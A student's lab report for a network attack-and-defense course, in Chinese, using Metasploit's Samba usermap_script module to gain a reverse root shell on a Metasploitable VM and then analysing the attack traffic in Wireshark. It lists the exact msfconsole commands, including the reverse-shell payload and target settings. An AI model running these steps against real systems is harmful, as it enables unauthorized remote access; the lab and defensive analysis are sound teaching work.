20211913-冯馨茹-2021-2022-2 《网络攻防实践》第七次实验

一、实验内容

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,使用msfconsole;

②使用exploit:exploit渗透攻击模块;

③选择攻击PAYLOAD为远程shell,;

④设置渗透攻击参数;

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

  • 攻击方:使用 Metasploit (192.168.200.123),选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

  • 防守方:使用 wireshark监听获得网络攻击的数据包文件,结合 wireshark分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

二、实验步骤

 使用Metasploit进行Linux远程渗透攻击

虚拟机 IP地址
kali 192.168.200.4
Metasploitable 192.168.200.123

首先,在虚拟机kali中通过命令msfconsole启动渗透软件

 

 输入命令search usermap来搜索漏洞,可以看出这是针对这个漏洞的渗透攻击模块。

 

 使用命令use exploit/multi/samba/usermap_script来进行对应脚本的攻击

 

 输入命令show payloads来获取攻击负载模块,并选择攻击负载模块

 

 输入命令set PAYLOAD cmd/unix/reverse来设置有效的攻击载荷。 再输入set rhost 192.168.200.123设置靶机地址,使用命令set lhost 192.168.200.4设置攻击机地址

 

 使用指令show options查看payload状态,看信息设置是否正确,截图如下

 

 使用指令exploit来执行攻击,攻击成功后使用指令whoami发现执行权限是root,使用指令ifconfig来查看靶机网络状态。

 

 攻防对抗实践

 

还是选择上一个实践中的漏洞,攻击过程同上 ,用wireshark来抓取查看

 在数据包中攻击方攻击使用的端口都在139

 查看第一个数据包,在信息栏中可以看到,攻击发起时间是2022 08:55:37

 在第一个shellcode中,可以看到攻击成功建立连接。

  在进一步追踪tcp数据流,可以成功看到本地执行命令的信息。

 三、学习中遇到的问题及解决

shellcode比较难找,跟同学一起讨论找到了。

四、学习感想与体会

这次实验相对步骤较少,完成的比较快。

 

 

posted @ 2022-05-01 16:00  xxxxxr  阅读(112)  评论(0)    收藏  举报